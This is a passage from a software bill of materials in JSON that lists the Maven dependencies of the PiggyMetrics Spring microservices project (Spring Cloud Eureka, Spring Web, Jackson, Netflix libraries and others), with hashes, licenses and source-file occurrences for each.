"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-384", "content": "237201a38459c81ecedba61d4d59a522cbea01b65297c1f068e11294dbc9da626035815b1846f08c1737058e33f021e9"}, {"alg": "SHA-256", "content": "7ff7145adc938be815a8055af0cdea0f720c6b356b57ac2136e53bcd5d25e97f"}, {"alg": "SHA-512", "content": "8a3f0018f3bdc5bb1ad4e246526cbdb422202d2b699c3a0cac0a765dd1d865f87b778a702f96ff2ad7b8ac6197afa46b6a6555c694ad57e0d3ce8608d071da73"}, {"alg": "MD5", "content": "8b93d4d30de32748b186aeacfa618f67"}, {"alg": "SHA3-256", "content": "cad94fdc93582973a4376fd3c4ee59ee34855af8f125db916de6e9b1a4b47793"}, {"alg": "SHA-384", "content": "dd690fb96277a00f46f6f81f53204d831853065abfc1bd57e61872b2c4c6858d26cd4be36d88cda8bd05e6e162c14299"}, {"alg": "SHA-1", "content": "e00b09813d5d3714dbbc150b91553267124e2250"}, {"alg": 
"SHA3-512", "content": "fcca16621c429111e17349f412e5f630df3aaed591e8c67457902512f293dbd890c40bd481660e1f95ab4ee3674450e37bf1291afad0e7d8f540c61c267217b4"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-starter-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2d792b6b575950436fe620ac173535a7fa0b7deccf290cbeb37ae7a21b6f6416"}, {"alg": "SHA-512", "content": "2e512df35dff02c0814d1a59a7ba7dbf8a4280c1658565c115f5a599f80401df9d5da043b3c0868230b79ba7c04ec53138f98aeede29fd703ae2ea25d7f357b4"}, {"alg": "SHA3-384", "content": "3a5cd5b3839f0fc79088457664f01597a6f948aa76efda13886f9144fa826b801ecf9b4d2b8135dd2d7d139fb985cacc"}, {"alg": "SHA3-512", "content": "3aa2f65011ba5f3923f0925d1b85180528ab5c57293353b3022ed8e3f90798a77cf13eae4beaea7d54eb60049a4776f5d9c994d56727c8bd7f8e4b9b39aa9d98"}, {"alg": "SHA-256", "content": "4686ea441f3b924e7f1631d49a6fb89a771a778fc7fd32612163d3c60ec21d14"}, {"alg": "MD5", "content": "46d482bf052f34fc1fde298864af2215"}, {"alg": "SHA-1", "content": "4e241e6685a4dfc45987945df6c2477503ae20d7"}, {"alg": "SHA-384", "content": "fe253756cdd8724e26477c505988966012a1e103b07e2f404967ed6760f0cb934d288c5aef8883f462e19a2fe9ea9841"}], "licenses": [{"license": {"id": 
"Apache-2.0"}}], "name": "spring-cloud-starter-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring AOP", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-aop\\5.0.7.RELEASE\\spring-aop-5.0.7.RELEASE.jar"}]}}, "group": "org.springframework", "hashes": [{"alg": "SHA-512", "content": "24ba927d8ea0ca58a8a6722fe99ed165b7174926a3f2ac731eaa8383e7f6b9f74caf7ae39562ef9ee324914ccf8ad5b6b7270bfc688a461c6feed089e778dffb"}, {"alg": "SHA-256", "content": "2de906598bfb44d3e6833c36e1ad9c565275af16da25e13e6f676126f613908c"}, {"alg": "SHA3-256", "content": "3f0c5849b9b772b3544611b78300843d6751fac5bf80dbec44a07d0fb95bb75c"}, {"alg": "SHA-384", "content": "67209dd624bfaa95f376772e89f0e574b971d9224a2c5ca91645a9a00b3e25ab8c4594e96ac7de09c2ac111767ec39ad"}, {"alg": "MD5", "content": "cd592093caba2866661a095786f1ed11"}, {"alg": "SHA3-512", "content": "e3871a6dea5b1a64cc8fba9b05a48a83b3924190f9eab5d576583ec9060cbf1982133f845360f0aa2f05cd9dab6b00a6e5f5dff5d8a33914848fff9bfe0f63d4"}, {"alg": "SHA3-384", "content": "e5a7367855624bc08bbf442cece3b894a285068b7a328e3451818fda2d9a148678c736a18d98eef1a6490587329015f2"}, {"alg": "SHA-1", "content": "fdd0b6aa3c9c7a188c3bfbf6dfd8d40e843be9ef"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-aop", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring 
Beans", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-beans\\5.0.7.RELEASE\\spring-beans-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\config\\ResourceServerConfig.java#28"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-256", "content": "0d0adc1832406304985a72d2c79c6d0af481f34ae2a9c4a3835c9b0968da25e3"}, {"alg": "SHA-512", "content": "58b8e141981594d43cc52fd179f512a1919eaa4ddd323127302fd753b5befb1b5ee8fc3b70adf4963bdaa181ac3ff67ed643bdacdde2881c26f12f55d3c34190"}, {"alg": "SHA3-256", "content": "72ae91c81771a542fb4ce30b45608b43dcfe03d9e18070763e7421fa0389d52c"}, {"alg": "SHA-1", "content": "c1196cb3e56da83e3c3a02ef323699f4b05feedc"}, {"alg": "MD5", "content": "c850badbb984cda6983da22c8672a59f"}, {"alg": "SHA-384", "content": "d2aaea6cd85065710cdc27d25dfd7bdfdea57f0f796214767e83f09b967c6cb2c954369a40e2e6f55f4106b43d099558"}, {"alg": "SHA3-512", "content": "ecb8c1471d73b885db4b4796a95a1af1e229f33724f2d3cbdf8df947f84fd1dcc6064a8ef2552189304df475283c9c899d4bcb3bdf3a0f97390aed50d0f8815b"}, {"alg": "SHA3-384", "content": "f35b746798ceaad156b257f6c208cc3e9783244d68501187af355a98613c048b62cee350b728c67fc067ddca41fabbe1"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-beans", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Web", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-web\\5.0.7.RELEASE\\spring-web-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\AuthServiceClient.java#12"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\StatisticsServiceClient.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#20"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#25"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#30"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#35"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#10"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#17"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#18"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\service\\security\\CustomUserInfoTokenServices.java#129"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#15"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#16"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#22"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#28"}, {"location": 
"notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\client\\AccountServiceClient.java#12"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#14"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#15"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#21"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\client\\ExchangeRatesClient.java#13"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#14"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#20"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#32"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-1", "content": "2e04c6c2922fbfa06b5948be14a5782db168b6ec"}, {"alg": "SHA3-384", "content": "797a7bd86ef730de5377d6fc66c1b7d03188260b62fbb72a58fbc025926877bbc94b5a7c7a03e4f4e1c0b12fe9a3df13"}, {"alg": "SHA-384", "content": "8af38fbf471db8437161cca583b115bad2084544661de14b98f023013eac4a735e7f820bdaf72118e55b5cbaf78cf1da"}, {"alg": "MD5", "content": "cdb97ca6e419ea429244db6b01ea9d09"}, {"alg": "SHA-256", "content": "d100479905e911a3201de66566f59bd5e2d4137f9d95b6d314acbb80ae985d22"}, {"alg": "SHA-512", "content": "da438577b4aeb0722ecfcaccfc43a37a07c78fdd6badc87caceb3abe58f31f82df9199e26a6b889a24bfe30cdf47626fbe8c4eb68e0f49497bd4b34e99f88b66"}, {"alg": "SHA3-512", "content": 
"e15fe01672fed6048e69d14ff865ce2986343d339c4ed806e5de0a2038b01a25dbbf457d3aa399692e8d8ad834c03e84619f683cd5bfee03facbf4500fbc51bb"}, {"alg": "SHA3-256", "content": "f86905c962d81e77ccdfeb4e189aad1cd22d015f7b35cb676a940e39aeb7c284"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-web", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}], "libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "type": "library", "description": "Core annotations used for value types, used by Jackson data binding package.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-annotations\\2.9.0\\jackson-annotations-2.9.0.jar"}]}, "occurrences": [{"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\domain\\ExchangeRatesContainer.java#9"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA-1", "content": "07c10d545325e3a6e72e06381afe469fd40eb701"}, {"alg": "SHA-512", "content": "266589c36ea544ebca94aecd76ba9dfe88637563b94cf24e46846466b103074c9f95508bfa237c20d0ab9c60bfb6befa2628236dcf7222a69cf1ef9462bcf0b3"}, {"alg": "SHA-384", "content": "36289e4a5d6774c4fc6ed38a632a681759a4bc0389616a79edd22298dbcbe8f1bc7a107f00a9ec76b492d125c890a939"}, {"alg": "SHA-256", "content": "45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a"}, {"alg": "SHA3-256", "content": "5ad4c52561d43e8f80798256ae39449955b2d34376d3fbb9f354f9fcb61f477a"}, {"alg": "SHA3-512", "content": "8322ba66c29bfa8152a4c6294f6c3350d7a59fce154ba9db8624e369085aae42585addf864f373d250f76e5678b5967ecac79aff9255d96e5c109f310424f208"}, {"alg": "MD5", "content": "c09faa1b063681cf45706c6df50685b6"}, {"alg": "SHA3-384", "content": 
"d575397eff488d8b2e2098f1bcc8c0a7d49a3c0532ecec9c2996709576cf9fffe967f421dab2c4d2e280867efefd71af"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-annotations", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "scope": "required", "version": "2.9.0"}, {"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "type": "library", "description": "General data-binding functionality for Jackson: works on core streaming API", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-databind\\2.9.6\\jackson-databind-2.9.6.jar"}]}, "occurrences": [{"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#114"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#118"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#131"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#143"}, {"location": "auth-service\\src\\test\\java\\com\\piggymetrics\\auth\\controller\\UserControllerTest.java#51"}, {"location": "notification-service\\src\\test\\java\\com\\piggymetrics\\notification\\controller\\RecipientControllerTest.java#53"}, {"location": "statistics-service\\src\\test\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsControllerTest.java#114"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-512", "content": "480f9d8a7e5c2cb7ff981b3e004708dd632f8c472a8da3114486499a15a4bfa21ee4904e4ac5f0d1aef4dccd19fc95ceb1f9f6d5a65ea13ca2a7d9815585f82e"}, {"alg": "SHA-256", "content": 
"657e3e979446d61f88432b9c50f0ccd9c1fe4f1c822d533f5572e4c0d172a125"}, {"alg": "SHA-384", "content": "80682058957cb75863d94f0ed223dc69cad95526e41b80d2810bfb04308c6fbd4bf4df90f43edacd8f820d43296b61ea"}, {"alg": "SHA3-256", "content": "885a3161af0a28a56a7d41631034921b846f9b1b0e02062e0758b17337026bdf"}, {"alg": "SHA3-384", "content": "a5682de7a39422fde523ad1d6fe2db75a4a390266692362e296115e06e07e515cb6b85598ada103e54031dbefc5ea7f3"}, {"alg": "MD5", "content": "c6634d654c2df15a987bc37ec8d2b6b2"}, {"alg": "SHA-1", "content": "cfa4f316351a91bfd95cb0644c6a2c95f52db1fc"}, {"alg": "SHA-512", "content": "f0861f775e2aebd61df8a39419f959b61019af7b307812b92beb14d7a234edeaf09c054fbb24a1432f4dd0c726b7d2b535bdc3ecb8b3d00b661e01d4d46ec4be"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-databind", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "type": "library", "description": "Gson JSON library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\google\\code\\gson\\gson\\2.8.5\\gson-2.8.5.jar"}]}}, "group": "com.google.code.gson", "hashes": [{"alg": "MD5", "content": "089104cb90d8b4e1aa00b1f5faef0742"}, {"alg": "SHA3-512", "content": "0aed985c19435fb6d5e04a79a7553f56a66814157ac93addcb24f9286321d0063b69ac008501f0e22f691ecb15a50491d3313aee73a745286454817e2f410fe9"}, {"alg": "SHA-256", "content": "233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81"}, {"alg": "SHA-512", "content": "5dd7214c542a7b93aab3eab0ba13e4ac3d6ddb05c795fb6d3992e21925a98dce87cb186ac67b4d3ad146f96e14d38b3892837eca57a27b4e845aca6d4e4f708a"}, {"alg": "SHA-384", "content": "77f4d6efe8d9cf78b72f34e439035d266db1b82c9d96e6b78e6c571d4c719bb5f2b78e8377263280c6cc9dffe18b3d16"}, 
{"alg": "SHA3-256", "content": "94cde12c15a685a10309653cfef73d14d09b340f1b8f0a9a04267136e9bf2820"}, {"alg": "SHA3-384", "content": "953e2eca6de4a05e1cf86a9750aa9f1d10bfd06a15f7eaab4a59716cbec74a7bf6c5f421b1752d487882954daecc5781"}, {"alg": "SHA-1", "content": "f645ed69d595b24d4cf8b3fbb64cc505bede8829"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "gson", "purl": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "scope": "required", "version": "2.8.5"}, {"bom-ref": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "type": "library", "description": "eureka-client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\eureka\\eureka-client\\1.9.2\\eureka-client-1.9.2.jar"}]}}, "group": "com.netflix.eureka", "hashes": [{"alg": "SHA-256", "content": "279fc7616a9c0c904dd11ba53aaeec0790d35511cbda2a81e8606b6c6a13c7f3"}, {"alg": "SHA3-256", "content": "2ed92d790b33a71dcc8de331d77bdde3c823ced8521ad0cd6e1f75430fdb04bf"}, {"alg": "SHA-512", "content": "3abb8075ff7ece646f8ae62c840a8b79b1163741a41e84a7dd7af939f554c6e2f9057ca901d10fe639b693fb9223a2f74bce00743b421a9263acdb246eeee7cb"}, {"alg": "SHA-1", "content": "47c0b71d8face149833c4958ac7b3b6171861f4c"}, {"alg": "SHA-384", "content": "99475120ea6b3ca18098f3346fe2a7ca539a472d2110e0aedf96d941403a1f37049df31785d1e4e3257adf44d0a5630a"}, {"alg": "SHA3-512", "content": "b0f8d56fa259be87844612709b83ba3611548215d405ecd02220a22e1539d2666a5cf37b51ca618291f92dbb007dfd4a6dfa037905bfd0d313b8221cc2605c5b"}, {"alg": "SHA3-384", "content": "b7a195e9f54f4189c8e27624ba44c5ff191ffe977d6e70ffc6d1795a4f4d4d3869d15992e555eed71cb427f744fd3b9b"}, {"alg": "MD5", "content": "f1a16ca3654e743409bb60c47eb02f01"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "eureka-client", "purl": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "scope": "required", 
"version": "1.9.2"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "type": "library", "description": "netflix-eventbus", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-eventbus\\0.3.0\\netflix-eventbus-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-512", "content": "13549ecc52b63986900eefd48441f78687a5ac0f89d752752f3c973e7d664607785a6b8850ef7ab6181cc4f90580301cc0a19f2fc694e3f97d9776bd43f416e9"}, {"alg": "SHA-384", "content": "192c415c11edbc320d0d7b2f41c485bae7dbc20d9f406d0b05a5d02436a005a72d4dc015190748749ac74314f20c496b"}, {"alg": "SHA-256", "content": "387bce0906f22c285ed96bcc520a7581d6abbc418b6c3c1e45a4530eb97d94b1"}, {"alg": "SHA-1", "content": "3f864adbe81f0849729fcbba3fe693c32be739ea"}, {"alg": "SHA3-256", "content": "840ce15c01ed37b974b4c5ab4a75d539afb6c43cad90437504d23884864735d5"}, {"alg": "MD5", "content": "8ad05394a13f658a67d1e4cbf0359402"}, {"alg": "SHA-512", "content": "94a6efc1be744e281211f7856037c057863ad67ee1a45bd4cfc1adbb15216a6cb20ba0d54caa26d902f653efe496098b5e71eb5b2c466b10deb94af7559f67a0"}, {"alg": "SHA3-384", "content": "d8580812de33ef27de8dc91205cf56b2aec19572fcfc7fd49e723ed17e4eb4d853f99627417bd9bd30f1cd7de24b4dcf"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-eventbus", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "type": "library", "description": "netflix-infix", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-infix\\0.3.0\\netflix-infix-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-256", "content": "14f1ba7c66c7b18a45bb2949f784d9028911bdf80376e1553bd9ed6d15083720"}, {"alg": "SHA-384", "content": "185629545fd32a7b890c4318cb7979f0475fa42e54039c80105c4eb20efbe5eabf0338ab59256440fc6366e9bc84d0e4"}, {"alg": "MD5", "content": "3410072887ca26fc0b7e71a7e91f8e2b"}, {"alg": "SHA-512", "content": "477278c1d16d6753a1a2acdb0edd8189b069db1828dd34d808985b48924257e0971ec190bf6efafb14b962e3e0158f2221c195a83fe9bd38fb1574e6cdbf90d3"}, {"alg": "SHA3-384", "content": "7aa7b6c88a89c3324677846543b54b5151d45370d48309a529e492576c64174958f22564ed0d5b88a24d5b0696554326"}, {"alg": "SHA-256", "content": "7dec45215c262c4f0a42c1f3adb8613788cf43c6ed21274e15c73ea5500d2597"}, {"alg": "SHA-1", "content": "acc65969f7367ddd2f1265e0cd7330509ed530dc"}, {"alg": "SHA3-512", "content": "e0b9054727385449f0d29062959eed8ca5f4dec126b85c82fd04155b136ecdf5a4dc1cb78b837f5ff3b86f72b3241d4507f0d4008f519aced1ff2637eb6df3c5"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-infix", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "type": "library", "description": "A Java-based implementation of XPath 1.0 that, in addition to XML processing, can inspect/modify Java object graphs (the library's explicit purpose) and even mixed Java/XML structures.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\commons-jxpath\\commons-jxpath\\1.3\\commons-jxpath-1.3.jar"}]}}, "group": "commons-jxpath", "hashes": [{"alg": "SHA-384", "content": 
"327139dac9f672ffa772480a754ec6c3125a3057faf7911188a34cc52d088770efe8464bb303e2347be7f55303d24493"}, {"alg": "SHA-512", "content": "351c5f6af0711a955e5d839551833015956812765e9dc35e78bfd7c99656f1ecec5cf6587469229688340f00c2b5d07917993ccb0809561e0dd35b4ffb074d93"}, {"alg": "SHA3-256", "content": "3bbafe102ece8be037419a214a524f0c52fa0c3455322d3c2633f1c075e9efbc"}, {"alg": "MD5", "content": "61a9aa8ff43ba10853571d57f724bf88"}, {"alg": "SHA3-384", "content": "b2913b137433bfc2fe78ed57dc44de5737410947e809c0b8bb1d6a83ad333069e41fd97167c20e9fd3a052c2a7dfa9b8"}, {"alg": "SHA-1", "content": "c22d7d0f0f40eb7059a23cfa61773a416768b137"}, {"alg": "SHA3-512", "content": "e050591ecd10746ffee670e1e95a53afa8b43b01164c3ae581bce9ee0a5410eece3f71d05175486eb4d186de88d5defeebef52730939611951ca1cd50ec978a7"}, {"alg": "SHA-256", "content": "fcbc0ad917d9d6a73c6df21fac322e00d213ef19cd94815a007c407a8a3ff449"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-jxpath", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "scope": "required", "version": "1.3"}, {"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\joda-time\\joda-time\\2.9.9\\joda-time-2.9.9.jar"}]}}, "group": "joda-time", "hashes": [{"alg": "SHA3-256", "content": "22837a75e07c2c56cb3565e324f157f0850f9df62471293af3a77ec2ad456535"}, {"alg": "SHA-512", "content": "3a6749ecd71ee8d5781821c36d77850a810e72ee33757ec4ee9e3d424676dced7eeb955a432f45edb3694dc14dbe1ee4c608545d6a445b29b86979a7c9829384"}, {"alg": "SHA-384", "content": "76fadb1a66e6e6f9780aef2ca6ecfe6e07c0abb0829cc436c0ebf02186ba571219a290ec4bf1b510059594b146d39eff"}, {"alg": "SHA3-384", "content": 
"9f4b85b886cd0b78b1404522979c0bd150dfe27f01469a17e943d35f5fad2de37fd88f35c0f0d49613c81a6fc0a8cd6b"}, {"alg": "SHA-256", "content": "b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7"}, {"alg": "SHA3-512", "content": "b7f8c9cac6086a5c7d861e5dfa9a42c1191ae17e9d9bfbae5eea2e1f6e25eb084fcb9bdc6bbb7d9c693d423452c9533b1216648793d5ca31675af23d1a0f0397"}, {"alg": "MD5", "content": "eca438c8cc2b1de38e28d884b7f15dbc"}, {"alg": "SHA-1", "content": "f7b520c458572890807d143670c9b24f4de90897"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}, {"bom-ref": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "type": "library", "description": "StringTemplate is a java template engine for generating source code, web pages, emails, or any other formatted text output. StringTemplate is particularly good at multi-targeted code generators, multiple site skins, and internationalization/localization. It evolved over years of effort developing jGuru.com. StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org and powers the ANTLR v3 code generator. Its distinguishing characteristic is that unlike other engines, it strictly enforces model-view separation. Strict separation makes websites and code generators more flexible and maintainable; it also provides an excellent defense against malicious template authors. 
There are currently about 600 StringTemplate source downloads a month.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\stringtemplate\\3.2.1\\stringtemplate-3.2.1.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "SHA-512", "content": "47f3cfd91906b527b615fd10d27387aafa9f355aa9c18a86861c975091c39895b711fe514ed1597dabe6af2a2705dfc45bb70fb5e30f5d428a48e0d1b02b7856"}, {"alg": "SHA-1", "content": "59ec8083721eae215c6f3caee944c410d2be34de"}, {"alg": "SHA3-256", "content": "6181e67482392f97de747d04dc11418e54ca77888d1d1f6925563fe6a2c1633b"}, {"alg": "SHA-384", "content": "a12c2a95e162207835a2a785f2dfccd4b3d9d9b94741d1b3e171ff04699afc920c549425115c63a95c7941ead3909edf"}, {"alg": "MD5", "content": "b58ca53e518a92a1991eb63b61917582"}, {"alg": "SHA3-384", "content": "d9ccd03170058316ea8c98142afbecb7a3b357dda5cd1253c9b57810449048fae7d79e93d5ba74cb901bd765429d8714"}, {"alg": "SHA3-512", "content": "e75331f732a6c9e280f04438db65c47aa2efb4b07980ad3ce5e227693b47c5959d87e40590e19552f67dc257cc4f187a35ee112e850a6bda9d9e69bba2dba34c"}, {"alg": "SHA-256", "content": "f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7"}], "licenses": [{"license": {"name": "BSD licence", "url": "http://antlr.org/license.html"}}], "name": "stringtemplate", "purl": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "scope": "required", "version": "3.2.1"}, {"bom-ref": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "type": "library", "description": 